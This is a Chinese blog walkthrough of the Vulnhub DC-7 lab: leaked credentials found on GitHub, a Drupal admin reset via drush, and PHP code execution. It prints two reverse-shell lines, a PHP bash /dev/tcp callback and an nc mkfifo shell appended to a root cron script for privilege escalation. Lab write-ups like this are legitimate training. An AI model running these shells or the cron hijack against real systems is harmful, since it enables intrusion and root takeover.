【Vulnhub】DC-7

信息收集

只开了两个端口22,80
先访问网站
在这里插入图片描述
还有一些提示,说明暴力破解不会成功
在这里插入图片描述
先扫目录,在找找中间件和框架有没有漏洞
多是多但是都用不了
在这里插入图片描述
目录里面也没什么敏感信息,还是看看别人的wp

DC-7引入了一些“新”概念,但我将留给你们去弄清楚它们是什么。:-)
虽然这个挑战并不完全是技术性的,但如果你需要诉诸暴力或字典攻击,你可能不会成功。
你要做的是跳出框框思考。在盒子外面。:-)
在左下角发现了一个 @DC7USER 处于好奇心 我们百度一下看看 果然第一个就是 GitHub项目 先把他下载下来
在这里插入图片描述
通过代码审计我们可以看到数据库的账号和密码:dc7user,MdR3xOgB7#dW 可以使用ssh登入!!
————————————————
版权声明:本文为优快云博主「落寞的魚丶」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.youkuaiyun.com/Aluxian_/article/details/123827661

…真有人把自己的账号密码都开源上去了
在这里插入图片描述
看着是sql密码,说不定别的也可以用,网站和ssh试试
在这里插入图片描述
在这里插入图片描述
上去了,/backups下就哪个.gpg格式不知道干啥的别的都没用,mbox像是root执行的信息
在这里插入图片描述
有个邮件看看
就是以一个自动记录脚本记录的dcuser7操作
在这里插入图片描述
陌生的命令,搜一搜:管理drupal的
在这里插入图片描述

$ drush cr 各种清缓存
$ drush pm-enable 安装module
$ drush pm-uninstall 卸载module
$ drush pm-list 显示所有modules and themes列表
$ drush user-password admin --password=“admin” 更改密码
————————————————
版权声明:本文为优快云博主「苏洛荨」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.youkuaiyun.com/qq_15936309/article/details/86590353、

错误大概意思就是需要在drupal里运行,cd到网站目录下

在这里插入图片描述

drush user-password admin --password="admin"

提权

实在不会,找的那个exp压根烂透了,一执行就乱报

拿到后台以后就可以考虑怎么进一步提升我们的权限了,按照惯例我们可以通过反弹shell的方式,一般是改文章,通过文章解析成代码,这里行不通,因为在 Drupal8中删除了这个解析的模块,那就只能找别的方式了
把这个模块再下载回来
地址https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
在这里插入图片描述
写入php脚本,反弹

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.100.134/10086 0>&1'");  //反弹脚本
?>

在/opt/scripts目录下的backups.sh脚本文件所属组是www-data,所以www-data用户可以对这个脚本文件进行操作,并且这个脚本文件定时执行可以利用它来反弹shell

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.0.103 7777 >/tmp/f" >> backups.sh
backups.sh是一个定时文件,root执行,所以反弹出来的权限也是root权限

等待定时任务执行,反弹权限。

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值